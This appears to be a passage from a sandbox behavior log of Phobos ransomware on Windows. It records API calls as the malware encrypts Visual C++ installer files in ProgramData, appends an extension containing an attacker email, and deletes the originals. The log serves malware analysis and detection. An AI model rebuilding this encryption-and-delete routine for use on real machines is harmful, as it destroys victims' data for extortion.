CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f430, dwBufLen=0x6f430 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f430) returned 1 [0179.603] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f430, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f430, lpOverlapped=0x0) returned 1 [0179.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0179.609] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.609] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0179.609] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.609] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0179.609] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0179.609] CloseHandle (hObject=0x178) returned 1 [0179.609] CloseHandle (hObject=0x180) returned 1 [0179.609] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe")) returned 1 [0179.613] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0179.613] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0179.614] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=151552) returned 1 [0179.614] CloseHandle (hObject=0x180) returned 1 [0179.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0179.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0179.614] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.614] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.614] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32aa8) returned 1 [0179.614] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.614] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x25000, lpOverlapped=0x0) returned 1 [0179.645] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25010, dwBufLen=0x25010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x25010) returned 1 [0179.646] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x25010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x25010, lpOverlapped=0x0) returned 1 [0180.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0180.029] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.029] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0180.029] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.029] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0180.029] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.029] CloseHandle (hObject=0x180) returned 1 [0180.029] CloseHandle (hObject=0x178) returned 1 [0180.029] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 1 [0180.048] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.048] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=666) returned 1 [0180.048] CloseHandle (hObject=0x178) returned 1 [0180.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm")) returned 0x20 [0180.048] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.049] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.049] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.049] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.049] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0180.079] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0180.079] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.079] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x29a, lpOverlapped=0x0) returned 1 [0180.080] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a0) returned 1 [0180.080] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2a0, lpOverlapped=0x0) returned 1 [0180.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ae8) returned 1 [0180.081] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.081] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0180.081] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.081] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0180.082] CryptDestroyKey (hKey=0xa32c68) returned 1 [0180.082] CloseHandle (hObject=0x178) returned 1 [0180.082] CloseHandle (hObject=0x14c) returned 1 [0180.082] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm")) returned 1 [0180.083] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.083] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0180.083] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=463016) returned 1 [0180.084] CloseHandle (hObject=0x14c) returned 1 [0180.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe")) returned 0x20 [0180.084] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0180.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.084] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.084] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0180.085] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.085] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x710a8, lpOverlapped=0x0) returned 1 [0180.109] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x710b0, dwBufLen=0x710b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x710b0) returned 1 [0180.124] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x710b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x710b0, lpOverlapped=0x0) returned 1 [0180.131] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0180.131] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.131] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0180.131] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.131] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0180.131] CryptDestroyKey (hKey=0xa32c68) returned 1 [0180.131] CloseHandle (hObject=0x14c) returned 1 [0180.131] CloseHandle (hObject=0x178) returned 1 [0180.131] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe")) returned 1 [0180.137] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.137] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.138] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1292987) returned 1 [0180.138] CloseHandle (hObject=0x178) returned 1 [0180.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0180.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.138] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.138] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.138] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.138] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0180.158] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.158] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0180.209] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0180.218] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0180.239] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2b9bb, lpOverlapped=0x0) returned 1 [0180.239] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2b9c0, dwBufLen=0x2b9c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2b9c0) returned 1 [0180.241] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2b9c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2b9c0, lpOverlapped=0x0) returned 1 [0180.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0180.243] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.243] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0180.243] CryptDestroyKey (hKey=0xa32d68) returned 1 [0180.243] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0180.243] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.243] CloseHandle (hObject=0x178) returned 1 [0180.243] CloseHandle (hObject=0x180) returned 1 [0180.243] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 1 [0180.245] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.245] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.246] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=147456) returned 1 [0180.246] CloseHandle (hObject=0x180) returned 1 [0180.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0180.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.246] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.246] 